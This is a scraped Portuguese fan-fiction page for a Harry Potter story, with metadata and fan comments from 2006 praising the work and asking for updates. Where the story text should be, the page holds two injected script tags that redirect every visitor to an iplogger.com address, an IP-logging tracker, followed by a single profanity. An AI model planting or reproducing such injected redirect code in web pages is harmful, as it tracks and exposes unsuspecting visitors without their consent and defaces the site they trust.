","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

Foda-se


Compartilhe!

anúncio

Comentários (2867)

  • oi eu sou nova aqui mas eu ADOREI !!!! sua fic esta PERFEITA!!! vc tem realmente muito talento, coloquei sua fic entre as minhas preferidas ,afinal ela merece!!! tudo esta se encaixando ,adorei as lutas , o novo personagem , as horcuxes, e a ideia de R A B não ser uma pessoa e sim três, sempre achei isso , mas eu nunca tinha lido em nenhuma fic, espero que os ultimos capitulos continuem assim e POR MERLIM ATUALIZA LOGO!!!! estou super ansiosa!!!! parabens

    2006-05-07
  • Sua fic esta d+++++++!!! a emoçao ao ler essa fic e tao boa qt os livros da J.K, vc tem futuro na carreira de escritora, bastante criatividade, sabe como usar as palavras e como dexar a pessoa bem fixada na historia!!! Esatamos aguardando pelo o ultimo capitulo!!! ATUALIZA!

    2006-05-07
  • Sua fic esta d+++++++!!! a emoçao ao ler essa fic e tao boa qt os livros da J.K, vc tem futuro na carreira de escritora, bastante criatividade, sabe como usar as palavras e como dexar a pessoa bem fixada na historia!!! Esatamos aguardando pelo o ultimo capitulo!!! ATUALIZA!

    2006-05-07
  • vc sabe q tem mesmo mto talento, e que sua fic esta simplesmente esplendida, mas vc devia atualizar ou n vai ter mais nenhum fan....vai todo mundo MORRER d ansiedade xD, por merlin, atualizaaa

    2006-05-07
  • preciso dize? a muito estou qrendo ler essa fic pq mi disseram que era otima... mais por probs tecnicos nao pude ler antes =´[ mais li ela hj (inteira) ih o que meu colega mi falo eh uma grande mintira... nao eh otima... eh PERFEITA MEU... MUITO BOA... sem coments... MUITO BOA MEU... PARABENS... NUM TEM MAIS O QUE EU DIZER... muito boa meu! bjo grandi para a criativa autora desta sensacional fic, Sonia!

    2006-05-07
  • simplesmente incrível, vc não sabe o quanto essa fic foi importante pra mim...eu era novo no floreios e borroes, num gostava mto d ler fics, ai fui procurar uma pra ler, fui em mais votadas e lah estava uma com um nome q eu axei mto sugestivo ^^ hp e o ultimo horcrux, dae entao, eu me apaixonei pelo site e por fics, claro q nenhuma com seu estilo, mas todas boas, ESSE CLASSICO TEM Q SER ATUALIZADO, TODOS ESPERAMOS ANCIOSOS!!!

    2006-05-06
  • Sua fic é demais... sem querer te pressionar mas já pressionando... Por Favor ATUALIZAAAAA!!!!! Todo dia eu entro na net... de tarde e de noite pra vê se vc postou o último capítulo... tow ansiosa por demais, daqui a pouco vou ter um troço! Ah e + uma coisinha... por nada nessa vida deixe de escrever fan fics viu??? Vc tem talento e naum deve parar!!!! Bjim e SUCESSOOOOO pra vc... xD

    2006-05-06
  • um capítulo melhor que o outro :T

    2006-05-06
  • Um voto e um beijo. Barbie

    2006-05-05
  • Sua fic eh 100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.....!!!!!!!!!!!!!!!!!! Atualiza por favor vai! Estou muito ansiosa para ler o próximo capitulo! Essa eh sem sombra de dúvidas a melhor fic q eu já li!!! Atualiza lovo, viu? Virei sua fã.... bjs

    2006-05-05
Você precisa estar logado para comentar. Faça Login.